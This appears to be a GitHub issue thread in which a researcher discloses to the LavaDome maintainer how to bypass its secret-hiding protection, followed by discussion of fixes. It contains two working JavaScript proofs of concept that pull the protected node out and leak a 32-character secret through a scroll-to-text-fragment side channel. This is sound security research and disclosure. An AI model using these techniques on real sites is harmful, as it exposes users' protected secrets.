LavaDome bypass by detaching iframe load events

[masatokinugawa]

I noticed that the recently added check by listening to an iframe's load event (#42) can be bypassed via a new window.

• Visit the demo using Chrome
• Open console and run the code below

const newWindow = window.open('404','_blank');//arbitrary same-origin page
newWindow.privateNode = PRIVATE.parentNode;
location="404"; // Detach iframe's load event
newWindow.eval(`
setTimeout(async function() {
  document.body.appendChild(window.privateNode);
  document.querySelector('h1').style.height = "1000px"; // Ensure that scrolling occurs
  window.scroll(0, 0);
  const sleep = ms => new Promise(r => setTimeout(r, ms));
  const secretChars = "0123456789abcdef";
  const secretLength = 32;
  let foundChars = "";
  for (let i = 0; i < secretLength; i++) {
    for (let j = 0; j < secretChars.length; j++) {
      location=\`#:~:text=This%20is%20a%20secret:-,\${foundChars}\${secretChars[j]}\`;
      await sleep(100); // Need to bypass Chrome's hang protection
      if (window.scrollY !== 0) {
        foundChars += secretChars[j];
        console.log(foundChars);
        window.scroll(0, 0);
        break;
      }
    }
  }
},2000)`);

[masatokinugawa]

I was able to get it to work into an iframe as well.

const privateNode = PRIVATE.parentNode;
document.open();
document.write('<body>');
const iframe = document.createElement('iframe');
iframe.src = "404";//arbitrary same-origin page
iframe.onload = async function() {
  iframe.onload = null;
  const iframeWindow = iframe.contentWindow;
  iframeWindow.document.body.appendChild(privateNode);
  iframeWindow.scroll(0, 0);
  const sleep = ms => new Promise(r => setTimeout(r, ms));
  const secretChars = "0123456789abcdef";
  const secretLength = 32;
  let foundChars = "";
  for (let i = 0; i < secretLength; i++) {
    for (let j = 0; j < secretChars.length; j++) {
      iframe.src = `404#:~:text=This%20is%20a%20secret:-,${foundChars}${secretChars[j]}`;
      await sleep(100); // Need to bypass Chrome's hang protection
      if (iframeWindow.scrollY !== 0) {
        foundChars += secretChars[j];
        console.log(foundChars);
        iframeWindow.scroll(0, 0);
        break;
      }
    }
  }
}
document.body.appendChild(iframe);

[masatokinugawa]

The reason the above way is possible should be due to this spec: https://html.spec.whatwg.org/multipage/dynamic-markup-insertion.html#opening-the-input-stream:~:text=For%20each%20shadow%2Dincluding%20inclusive%20descendant%20node%20of%20document%2C%20erase%20all%20event%20listeners%20and%20handlers%20given%20node%2E

[weizman]

Very clever, that might make event-based protection a bad idea - thanks!
Thoughts on how to properly handle the problem differently?

[weizman]

Actually, what if the load event was an attribute on the iframe? That should solve it i think

[weizman]

Although should be hard to defensively access native apis via string

[masatokinugawa]

It seems on* attributes are also be disabled by document.open(). I created the test page: https://masatokinugawa.github.io/js/shadowDOM_document.open2.html

erase all event listeners and handlers given node

I think "handlers" refer to on* attributes.

[weizman]

wow yea i just managed to test it out myself too, kinda weird

[weizman]

I think #57 is an interesting approach around this which also seems to work, but the practice of turning strings into JS conflicts with different problems, such as CSP..